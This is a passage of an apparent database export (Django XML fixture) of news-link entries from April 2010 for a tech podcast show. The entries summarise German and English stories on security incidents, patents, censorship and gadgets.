&lt;/p&gt;</field><field type="CharField" name="external_url">http://www.handelsblatt.com/technologie/mobile-welt/ipad-konkurrent-blogger-entlarven-wepad-fake;2560867</field><field type="FileField" name="page_screenshot">page_shots/2010/04/13/we-pad-even-runs-windows.png</field><field type="SlugField" name="slug">we-pad-even-runs-windows</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">1</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-04-13 14:22:02</field><field to="show.pentashow" name="show" rel="ManyToOneRel">2</field><field type="CharField" name="tags_string">ipad wepad</field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"><object pk="7"></object></field></object><object pk="89" model="submitter.newsentry"><field type="CharField" name="title">NASA hacker's mother stands for Parliament</field><field type="TextField" name="excerpt">The mother of NASA hacker Gary McKinnon is standing for Parliament as an independent candidate in Blackburn, Lancashire, in a bid to prevent the "erosion of civil liberties".
Janice Sharp, who lives in Hertfordshire, will be standing against Labour's Jack Straw, who is the current Minister for Justice.
"Jack Straw led us to believe the extradition treaty would only be used for terrorists, but it is not being used for this," Sharp told the BBC.
"Once these things are brought in, we don't know where they will go next. It's very frightening."</field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html">&lt;p&gt;The mother of NASA hacker Gary McKinnon is standing for Parliament as an independent candidate in Blackburn, Lancashire, in a bid to prevent the "erosion of civil liberties".
&lt;/p&gt;
&lt;p&gt;Janice Sharp, who lives in Hertfordshire, will be standing against Labour's Jack Straw, who is the current Minister for Justice.
&lt;/p&gt;
&lt;p&gt;"Jack Straw led us to believe the extradition treaty would only be used for terrorists, but it is not being used for this," Sharp told the BBC.
&lt;/p&gt;
&lt;p&gt;"Once these things are brought in, we don't know where they will go next. It's very frightening."
&lt;/p&gt;</field><field type="CharField" name="external_url">http://www.networkworld.com/news/2010/041210-nasa-hackers-mother-stands-for.html</field><field type="FileField" name="page_screenshot">page_shots/2010/04/12/nasa-hackers-mother-stands-for-parliament.png</field><field type="SlugField" name="slug">nasa-hackers-mother-stands-for-parliament</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">1</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-04-12 17:55:23</field><field to="show.pentashow" name="show" rel="ManyToOneRel">2</field><field type="CharField" name="tags_string">nasa uk</field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"><object pk="3"></object></field></object><object pk="88" model="submitter.newsentry"><field type="CharField" name="title">heise online - Datenpanne führt zur ungenehmigten Organentnahme in Großbritannien</field><field type="TextField" name="excerpt">Das britische Gesundheitsministerium hat sich in einer Erklärung dafür entschuldigt, dass durch eine IT-Panne Genehmigungs-Details im zentralen Spendenregister durcheinander geworfen wurden. Laut Presseberichten wurden etwa 20 Toten Organe gegen deren vorher erklärten Willen entnommen.</field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html">&lt;p&gt;Das britische Gesundheitsministerium hat sich in einer Erklärung dafür entschuldigt, dass durch eine IT-Panne Genehmigungs-Details im zentralen Spendenregister durcheinander geworfen wurden. Laut Presseberichten wurden etwa 20 Toten Organe gegen deren vorher erklärten Willen entnommen.
&lt;/p&gt;</field><field type="CharField" name="external_url">http://www.heise.de/newsticker/meldung/Datenpanne-fuehrt-zur-ungenehmigten-Organentnahme-in-Grossbritannien-974937.html</field><field type="FileField" name="page_screenshot">page_shots/2010/04/11/heise-online-datenpanne-fuhrt-zur-ungenehmigten.png</field><field type="SlugField" name="slug">heise-online-datenpanne-fuhrt-zur-ungenehmigten</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">1</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-04-11 22:35:40</field><field to="show.pentashow" name="show" rel="ManyToOneRel">2</field><field type="CharField" name="tags_string">uk</field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"><object pk="4"></object></field></object><object pk="87" model="submitter.newsentry"><field type="CharField" name="title">Interesting times for Video on the Web - Google Open Source Blog</field><field type="TextField" name="excerpt">Google has decided to fund the development of Theora optimized for ARM processors.
Gute Zusammenfassung beim [Economist](www.economist.com/science-technology/displaystory.cfm?story_id=15927112) auch im Zusammenspiel mit Flash, Apple etc.</field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html">&lt;p&gt;Google has decided to fund the development of Theora optimized for ARM processors.
&lt;/p&gt;
&lt;p&gt;Gute Zusammenfassung beim &lt;a href="www.economist.com/science-technology/displaystory.cfm?story_id=15927112"&gt;Economist&lt;/a&gt; auch im Zusammenspiel mit Flash, Apple etc.
&lt;/p&gt;</field><field type="CharField" name="external_url">http://google-opensource.blogspot.com/2010/04/interesting-times-for-video-on-web.html</field><field type="FileField" name="page_screenshot">page_shots/2010/04/17/interesting-times-for-video-on-the-web-google-op.png</field><field type="SlugField" name="slug">interesting-times-for-video-on-the-web-google-op</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">1</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-04-10 21:03:12</field><field to="show.pentashow" name="show" rel="ManyToOneRel">2</field><field type="CharField" name="tags_string">google patent theora video vp8</field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"><object pk="3"></object><object pk="4"></object></field></object><object pk="86" model="submitter.newsentry"><field type="CharField" name="title">Spy Network Pilfered Classified Docs From Indian Government and Others | Threat Level | Wired.com</field><field type="TextField" name="excerpt">In what must be a "tempting fate" statement the
Indian military stated last month that their [systems are hack-proof]
(http://timesofindia.indiatimes.com/India/Cyber-war-Army-says-its-systems-are-hack-proof/articleshow/4336279.cms)
A spy network targeting government networks in India and other countries has been pilfering highly classified and other sensitive documents related to missile systems, the movement of military forces and relations among countries, according to a report released Tuesday.
It also grabbed nearly a years worth of personal correspondence from the Dalai Lamas office, even after reports published last year indicated that the Dalai Lamas network had been compromised in what is believed to be a separate breach.</field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html">&lt;p&gt;In what must be a "tempting fate" statement the
Indian military stated last month that their &lt;a href="http://timesofindia.indiatimes.com/India/Cyber-war-Army-says-its-systems-are-hack-proof/articleshow/4336279.cms"&gt;systems are hack-proof&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;A spy network targeting government networks in India and other countries has been pilfering highly classified and other sensitive documents related to missile systems, the movement of military forces and relations among countries, according to a report released Tuesday.
&lt;/p&gt;
&lt;p&gt;It also grabbed nearly a years worth of personal correspondence from the Dalai Lamas office, even after reports published last year indicated that the Dalai Lamas network had been compromised in what is believed to be a separate breach.
&lt;/p&gt;</field><field type="CharField" name="external_url">http://www.wired.com/threatlevel/2010/04/shadow-network/</field><field type="FileField" name="page_screenshot">page_shots/2010/04/09/spy-network-pilfered-classified-docs-from-indian-g.png</field><field type="SlugField" name="slug">spy-network-pilfered-classified-docs-from-indian-g</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">1</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-04-09 22:50:13</field><field to="show.pentashow" name="show" rel="ManyToOneRel">2</field><field type="CharField" name="tags_string">china hack india</field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"><object pk="4"></object></field></object><object pk="85" model="submitter.newsentry"><field type="CharField" name="title">Romania Swoops In on 70 Cybertheft Suspects | Threat Level | Wired.com</field><field type="TextField" name="excerpt">Romanian police have arrested 70 people believed to be members of three
separate cyber crime groups. The suspects allegedly obtained eBay login
credentials through phishing attacks. Nearly 800 people have been
identified as victims in the scheme, which also involved selling items
that did not exist or were never delivered. In all, an estimated US $1
million was lost. The investigation, named Operation Valley of the
Kings, involved law enforcement authorities in cities around the world.</field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html">&lt;p&gt;Romanian police have arrested 70 people believed to be members of three
separate cyber crime groups. The suspects allegedly obtained eBay login
credentials through phishing attacks. Nearly 800 people have been
identified as victims in the scheme, which also involved selling items
that did not exist or were never delivered. In all, an estimated US $1
million was lost. The investigation, named Operation Valley of the
Kings, involved law enforcement authorities in cities around the world.
&lt;/p&gt;</field><field type="CharField" name="external_url">http://www.wired.com/threatlevel/2010/04/romania-cyber-thieves</field><field type="FileField" name="page_screenshot">page_shots/2010/04/09/romania-swoops-in-on-70-cybertheft-suspects-thre.png</field><field type="SlugField" name="slug">romania-swoops-in-on-70-cybertheft-suspects-thre</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">1</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-04-09 22:44:54</field><field to="show.pentashow" name="show" rel="ManyToOneRel">2</field><field type="CharField" name="tags_string">ebay fraud romania</field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"><object pk="4"></object></field></object><object pk="84" model="submitter.newsentry"><field type="CharField" name="title">NYT ethicist: OK to pirate ebooks once you've bought the hardcover</field><field type="TextField" name="excerpt">Randy Cohen, author of the New York Times's The Ethicist column, was asked to venture an opinion on whether it's OK to download a pirate ebook after you've bought the hardcover. He says it's ethical, even if it's illegal: </field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html">&lt;p&gt;Randy Cohen, author of the New York Times's The Ethicist column, was asked to venture an opinion on whether it's OK to download a pirate ebook after you've bought the hardcover. He says it's ethical, even if it's illegal:
&lt;/p&gt;</field><field type="CharField" name="external_url">http://www.nytimes.com/2010/04/04/magazine/04FOB-ethicist-t.html?ref=magazine</field><field type="FileField" name="page_screenshot">page_shots/2010/04/09/nyt-ethicist-ok-to-pirate-ebooks-once-youve-boug.png</field><field type="SlugField" name="slug">nyt-ethicist-ok-to-pirate-ebooks-once-youve-boug</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">13</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-04-09 11:07:23</field><field to="show.pentashow" name="show" rel="ManyToOneRel">2</field><field type="CharField" name="tags_string">copyright, ebook, file sharing, piracy</field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"><object pk="3"></object></field></object><object pk="83" model="submitter.newsentry"><field type="CharField" name="title">Bank insider charged over ATM malware scam • The Register</field><field type="TextField" name="excerpt">An IT worker at Bank of America has been charged with hacking ATM systems so that machines handed out cash without recording his transactions, IDG reports.</field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html">&lt;p&gt;An IT worker at Bank of America has been charged with hacking ATM systems so that machines handed out cash without recording his transactions, IDG reports.
&lt;/p&gt;</field><field type="CharField" name="external_url">http://www.theregister.co.uk/2010/04/08/bofa_atm_hack_charges/</field><field type="FileField" name="page_screenshot">page_shots/2010/04/08/bank-insider-charged-over-atm-malware-scam-the-r.png</field><field type="SlugField" name="slug">bank-insider-charged-over-atm-malware-scam-the-r</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">1</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-04-08 17:31:05</field><field to="show.pentashow" name="show" rel="ManyToOneRel">2</field><field type="CharField" name="tags_string">atm bank hack</field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"><object pk="4"></object></field></object><object pk="82" model="submitter.newsentry"><field type="CharField" name="title">Teen Sues Mom for Hacking Facebook Account - PCWorld</field><field type="TextField" name="excerpt">a 16-year-old Arkansas boy is suing his mother for hacking into his Facebook account and allegedly posting slanderous remarks.</field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html">&lt;p&gt;a 16-year-old Arkansas boy is suing his mother for hacking into his Facebook account and allegedly posting slanderous remarks.
&lt;/p&gt;</field><field type="CharField" name="external_url">http://www.pcworld.com/article/193776/teen_sues_mom_for_hacking_facebook_account.html</field><field type="FileField" name="page_screenshot">page_shots/2010/04/08/teen-sues-mom-for-hacking-facebook-account-pcwor.png</field><field type="SlugField" name="slug">teen-sues-mom-for-hacking-facebook-account-pcwor</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">1</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-04-08 17:26:36</field><field to="show.pentashow" name="show" rel="ManyToOneRel">2</field><field type="CharField" name="tags_string">facebook</field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"><object pk="4"></object><object pk="7"></object></field></object><object pk="81" model="submitter.newsentry"><field type="CharField" name="title">Location der geblockten Seiten in Dänemark</field><field type="TextField" name="excerpt">97% der blockierten Webseiten auf der dänischen Blocking-List sind in den USA, EU und Canada</field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html">&lt;p&gt;97% der blockierten Webseiten auf der dänischen Blocking-List sind in den USA, EU und Canada
&lt;/p&gt;</field><field type="CharField" name="external_url">http://itpol.dk/censur/internetblokering</field><field type="FileField" name="page_screenshot">page_shots/2010/04/08/location-der-geblockten-seiten-in-danemark.png</field><field type="SlugField" name="slug">location-der-geblockten-seiten-in-danemark</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">1</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-04-08 10:31:24</field><field to="show.pentashow" name="show" rel="ManyToOneRel">2</field><field type="CharField" name="tags_string">censorship</field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"><object pk="3"></object><object pk="4"></object></field></object><object pk="80" model="submitter.newsentry"><field type="CharField" name="title">OtherOS on PS3 3.21 reactivated</field><field type="TextField" name="excerpt">Noted iPhone and PlayStation 3 hacker George Hotz, or GeoHot, told the gaming community not to update their systems until he was able to release custom firmware allowing them to continue using their Linux partitions, and it looks as if he's close to his goal. A new video posted today shows the hack, although a release date hasn't been given for the rest of us to download his work.
In UK hat Amazon 20% des Kaufpreises zurück gezahlt, weil hier der Händler für die Funktion 2 Jahre haftet.
www.heise.de/newsticker/meldung/Amazon-zahlt-fuer-Wegfall-der-Linux-Funktion-bei-der-PS3-975486.html</field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html">&lt;p&gt;Noted iPhone and PlayStation 3 hacker George Hotz, or GeoHot, told the gaming community not to update their systems until he was able to release custom firmware allowing them to continue using their Linux partitions, and it looks as if he's close to his goal. A new video posted today shows the hack, although a release date hasn't been given for the rest of us to download his work.
&lt;/p&gt;
&lt;p&gt;In UK hat Amazon 20% des Kaufpreises zurück gezahlt, weil hier der Händler für die Funktion 2 Jahre haftet.
www.heise.de/newsticker/meldung/Amazon-zahlt-fuer-Wegfall-der-Linux-Funktion-bei-der-PS3-975486.html
&lt;/p&gt;</field><field type="CharField" name="external_url">http://arstechnica.com/gaming/news/2010/04/custom-firmware-on-ps3-linux-on-slims-geohot-fights-back.ars</field><field type="FileField" name="page_screenshot">page_shots/2010/04/12/otheros-on-ps3-321-reactivated.png</field><field type="SlugField" name="slug">otheros-on-ps3-321-reactivated</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">1</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-04-08 10:28:02</field><field to="show.pentashow" name="show" rel="ManyToOneRel">2</field><field type="CharField" name="tags_string">linux otheros ps3 sony</field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"><object pk="5"></object></field></object><object pk="79" model="submitter.newsentry"><field type="CharField" name="title"> Millions will have to buy routers to beat hackers - Times Online </field><field type="TextField" name="excerpt">Millions of internet users will have to spend up to £70 each to upgrade their wi-fi equipment or risk heavy fines if hackers use their connection to download pirated material.
New laws to clamp down on illegal filesharing are expected to complete their passage through Parliament on Wednesday. Home owners with insecure broadband connections will be responsible for any material illegally downloaded through their network.</field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html">&lt;p&gt;Millions of internet users will have to spend up to £70 each to upgrade their wi-fi equipment or risk heavy fines if hackers use their connection to download pirated material.
&lt;/p&gt;
&lt;p&gt;New laws to clamp down on illegal filesharing are expected to complete their passage through Parliament on Wednesday. Home owners with insecure broadband connections will be responsible for any material illegally downloaded through their network.
&lt;/p&gt;</field><field type="CharField" name="external_url">http://business.timesonline.co.uk/tol/business/industry_sectors/technology/article7086250.ece</field><field type="FileField" name="page_screenshot">page_shots/2010/04/06/millions-will-have-to-buy-routers-to-beat-hackers.png</field><field type="SlugField" name="slug">millions-will-have-to-buy-routers-to-beat-hackers</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">1</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-04-06 21:14:07</field><field to="show.pentashow" name="show" rel="ManyToOneRel">2</field><field type="CharField" name="tags_string">uk wireless</field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"><object pk="3"></object><object pk="4"></object><object pk="7"></object></field></object><object pk="78" model="submitter.newsentry"><field type="CharField" name="title">Cyber warrior Camps for Recruitment</field><field type="TextField" name="excerpt">“Its about growing the next generation of cyberwarriors to protect the nation,” said Alan Greenberg, technical director of cyber and information solutions at Boeing, an event sponsor that hired seven students who competed in the event last year and may fill positions with this years contestants.
Demand for computer security experts is surging in the wake of high-profile threats such as the ones outlined by Google Inc., which said in January that Chinese hackers stole intellectual property and targeted e-mail accounts of human- rights activists. The U.S. government and companies will need about 60,000 cybersecurity workers in the next three years, Greenberg said.</field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html">&lt;p&gt;“Its about growing the next generation of cyberwarriors to protect the nation,” said Alan Greenberg, technical director of cyber and information solutions at Boeing, an event sponsor that hired seven students who competed in the event last year and may fill positions with this years contestants.
&lt;/p&gt;
&lt;p&gt;Demand for computer security experts is surging in the wake of high-profile threats such as the ones outlined by Google Inc., which said in January that Chinese hackers stole intellectual property and targeted e-mail accounts of human- rights activists. The U.S. government and companies will need about 60,000 cybersecurity workers in the next three years, Greenberg said.
&lt;/p&gt;</field><field type="CharField" name="external_url">http://www.bloomberg.com/apps/news?pid=20601100&amp;sid=abmfWsuQyyk0</field><field type="FileField" name="page_screenshot">page_shots/2010/04/06/cyber-warrior-camps-for-recruitment.png</field><field type="SlugField" name="slug">cyber-warrior-camps-for-recruitment</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">1</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-04-06 21:11:49</field><field to="show.pentashow" name="show" rel="ManyToOneRel">2</field><field type="CharField" name="tags_string">recruitment</field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"><object pk="4"></object></field></object><object pk="77" model="submitter.newsentry"><field type="CharField" name="title">FOSS Patents: IBM breaks the taboo and betrays its promise to the FOSS community</field><field type="TextField" name="excerpt">After years of pretending to be a friend of Free and Open Source Software (FOSS), IBM now shows its true colors. IBM breaks the number one taboo of the FOSS community and shamelessly uses its patents against a well-respected FOSS project, the Hercules mainframe emulator.
...
This is so appalling that I felt compelled to show to the FOSS community what IBM is doing: IBM is using patent warfare in order to protect its highly lucrative mainframe monopoly against Free and Open Source Software.
Patents against FOSS and customer choice</field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html">&lt;p&gt;After years of pretending to be a friend of Free and Open Source Software (FOSS), IBM now shows its true colors. IBM breaks the number one taboo of the FOSS community and shamelessly uses its patents against a well-respected FOSS project, the Hercules mainframe emulator.
...
This is so appalling that I felt compelled to show to the FOSS community what IBM is doing: IBM is using patent warfare in order to protect its highly lucrative mainframe monopoly against Free and Open Source Software.
&lt;/p&gt;
&lt;p&gt;Patents against FOSS and customer choice
&lt;/p&gt;</field><field type="CharField" name="external_url">http://fosspatents.blogspot.com/2010/04/ibm-breaks-taboo-and-betrays-its.html</field><field type="FileField" name="page_screenshot">page_shots/2010/04/06/foss-patents-ibm-breaks-the-taboo-and-betrays-its.png</field><field type="SlugField" name="slug">foss-patents-ibm-breaks-the-taboo-and-betrays-its</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">1</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-04-06 19:00:41</field><field to="show.pentashow" name="show" rel="ManyToOneRel">2</field><field type="CharField" name="tags_string">ibm patent</field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"><object pk="1"></object></field></object><object pk="76" model="submitter.newsentry"><field type="CharField" name="title">heise online - Vorläufiges Aus für E-Voting in Österreich</field><field type="TextField" name="excerpt">Die neue österreichische Wissenschaftsministerin Beatrix Karl (ÖVP) hat das von ihrem Amtsvorgänger Johannes Hahn (ÖVP, nunmehr EU-Kommissar für Regionalpolitik) eingeführte E-Voting vorerst gestoppt. Bei der nächsten Wahl zur Studentenvertretung österreichische Hochschülerschaft (ÖH) spätestens 2011 wird es damit keine Stimmabgabe über das Internet geben. Karl und die ÖVP setzen sich zwar weiterhin für E-Voting als "Briefwahl des 21. Jahrhunderts" ein und möchten es auch bei anderen Wahlen einführen; doch sieht Karl in der gegenwärtig geringen Verbreitung der notwendigen Bürgerkarte einen Hemmschuh. Ein weiterer Grund sei die Ablehnung durch die ÖH selbst, sagte die Ministerin gegenüber der Tageszeitung Der Standard.</field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html">&lt;p&gt;Die neue österreichische Wissenschaftsministerin Beatrix Karl (ÖVP) hat das von ihrem Amtsvorgänger Johannes Hahn (ÖVP, nunmehr EU-Kommissar für Regionalpolitik) eingeführte E-Voting vorerst gestoppt. Bei der nächsten Wahl zur Studentenvertretung österreichische Hochschülerschaft (ÖH) spätestens 2011 wird es damit keine Stimmabgabe über das Internet geben. Karl und die ÖVP setzen sich zwar weiterhin für E-Voting als "Briefwahl des 21. Jahrhunderts" ein und möchten es auch bei anderen Wahlen einführen; doch sieht Karl in der gegenwärtig geringen Verbreitung der notwendigen Bürgerkarte einen Hemmschuh. Ein weiterer Grund sei die Ablehnung durch die ÖH selbst, sagte die Ministerin gegenüber der Tageszeitung Der Standard.
&lt;/p&gt;</field><field type="CharField" name="external_url">http://www.heise.de/newsticker/meldung/Vorlaeufiges-Aus-fuer-E-Voting-in-Oesterreich-969992.html</field><field type="FileField" name="page_screenshot">page_shots/2010/04/06/heise-online-vorlaufiges-aus-fur-e-voting-in-ost.png</field><field type="SlugField" name="slug">heise-online-vorlaufiges-aus-fur-e-voting-in-ost</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">1</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-04-06 12:25:02</field><field to="show.pentashow" name="show" rel="ManyToOneRel">2</field><field type="CharField" name="tags_string">voting</field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"><object pk="3"></object></field></object><object pk="75" model="submitter.newsentry"><field type="CharField" name="title">MS XML Patent bestätigt</field><field type="TextField" name="excerpt">Ein US-Bundesgericht hat die von Microsoft beantragte Wiederaufnahme des Patentstreits mit dem kleinen kanadischen Unternehmen i4i abgelehnt. Damit dürfte auch der letzte Versuch gescheitert sein, die Niederlage in dem Rechtsstreit um "Custom XML" abzuwenden.
...
Microsoft war im Mai 2009 zu einer Schadensersatzsumme von 290 Millionen US-Dollar verurteilt worden. Nach den Feststellungen des Gerichts hat der Softwareriese das 1994 erteilte US-Patent 5.787.449 vorsätzlich verletzt. Es beschreibt ein Verfahren, mit dem Struktur und Inhalte von Dokumenten in einem Computer getrennt bearbeitet werden können. Im August 2009 verhängte das Gericht zusätzlich ein Verkaufsverbot für Office-Versionen, die das Patent verletzen. </field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html">&lt;p&gt;Ein US-Bundesgericht hat die von Microsoft beantragte Wiederaufnahme des Patentstreits mit dem kleinen kanadischen Unternehmen i4i abgelehnt. Damit dürfte auch der letzte Versuch gescheitert sein, die Niederlage in dem Rechtsstreit um "Custom XML" abzuwenden.
...
Microsoft war im Mai 2009 zu einer Schadensersatzsumme von 290 Millionen US-Dollar verurteilt worden. Nach den Feststellungen des Gerichts hat der Softwareriese das 1994 erteilte US-Patent 5.787.449 vorsätzlich verletzt. Es beschreibt ein Verfahren, mit dem Struktur und Inhalte von Dokumenten in einem Computer getrennt bearbeitet werden können. Im August 2009 verhängte das Gericht zusätzlich ein Verkaufsverbot für Office-Versionen, die das Patent verletzen.
&lt;/p&gt;</field><field type="CharField" name="external_url">http://www.heise.de/newsticker/meldung/Microsoft-verliert-XML-Patentstreit-969988.html</field><field type="FileField" name="page_screenshot">page_shots/2010/04/04/ms-xml-patent-bestatigt.png</field><field type="SlugField" name="slug">ms-xml-patent-bestatigt</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">1</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-04-04 23:29:42</field><field to="show.pentashow" name="show" rel="ManyToOneRel">2</field><field type="CharField" name="tags_string">microsoft patent xml</field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"><object pk="1"></object></field></object><object pk="74" model="submitter.newsentry"><field type="CharField" name="title">iBooks naughty word filter doesn't let you say "sperm"</field><field type="TextField" name="excerpt">Dean spotted that bowdlerization is afoot in the iPad's bookstore's selection of classic literature! This includes obvious candidates such as a certain Joseph Conrad classic.
But ... sperm?</field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html">&lt;p&gt;Dean spotted that bowdlerization is afoot in the iPad's bookstore's selection of classic literature! This includes obvious candidates such as a certain Joseph Conrad classic.
&lt;/p&gt;
&lt;p&gt;But ... sperm?
&lt;/p&gt;</field><field type="CharField" name="external_url">http://www.boingboing.net/2010/04/04/ibooks-censortron-do.html</field><field type="FileField" name="page_screenshot">page_shots/2010/04/04/ibooks-naughty-word-filter-doesnt-let-you-say-sp.png</field><field type="SlugField" name="slug">ibooks-naughty-word-filter-doesnt-let-you-say-sp</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">13</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-04-04 22:44:08</field><field to="show.pentashow" name="show" rel="ManyToOneRel">2</field><field type="CharField" name="tags_string">apple censorship ebook fail filter ipad</field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"><object pk="7"></object></field></object><object pk="73" model="submitter.newsentry"><field type="CharField" name="title">Facebook-Fehler führte zur Veröffentlichung aller E-Mail-Adressen</field><field type="TextField" name="excerpt">"Ein Fehler auf Facebook hatte dazu geführt, dass heute in den Morgenstunden wohl für ungefähr 30 Minuten alle E-Mail-Adressen in den Profilen von Facebook-Nutzern sichtbar waren - unabhängig davon, was in den Privateinstellungen festgelegt wurde."</field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html">&lt;p&gt;"Ein Fehler auf Facebook hatte dazu geführt, dass heute in den Morgenstunden wohl für ungefähr 30 Minuten alle E-Mail-Adressen in den Profilen von Facebook-Nutzern sichtbar waren - unabhängig davon, was in den Privateinstellungen festgelegt wurde."
&lt;/p&gt;</field><field type="CharField" name="external_url">http://www.mactechnews.de/news/index/Facebook-Fehler-fuhrte-zur-Veroffentlichung-aller-E-Mail-Adressen-146413.html</field><field type="FileField" name="page_screenshot">page_shots/2010/03/31/facebook-fehler-fuhrte-zur-veroffentlichung-aller.png</field><field type="SlugField" name="slug">facebook-fehler-fuhrte-zur-veroffentlichung-aller</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">6</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-03-31 21:19:22</field><field to="show.pentashow" name="show" rel="ManyToOneRel">2</field><field type="CharField" name="tags_string">datenschutz facebook</field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"><object pk="9"></object></field></object><object pk="72" model="submitter.newsentry"><field type="CharField" name="title">heise online - Webseite des Umweltbundesamtes verteilte Trojaner</field><field type="TextField" name="excerpt">Die Startseite des Umweltbundesamtes www.umweltbundesamt.de (UBA) war mit dem Trojaner ZeuS infiziert. Möglicherweise wurden PCs von Besuchern ebenfalls mit ZeuS infiziert. ZeuS ist ein äußerst effektiver Trojaner, der es insbesondere auf Online-Banking-Daten abgesehen hat. Er ist in der Lage, seinem Opfer eine echte Bankseite vorzugaukeln, indem er eigenen HTML-Code in den Browser schleust. Eingegebene PINs, TANs und anderen Daten verschickt er in Echtzeit unter anderem mit einem integrierten Instant-Messaging-Client. Er tarnt sich im System mittels Rootkit-Techniken.
Anzeige
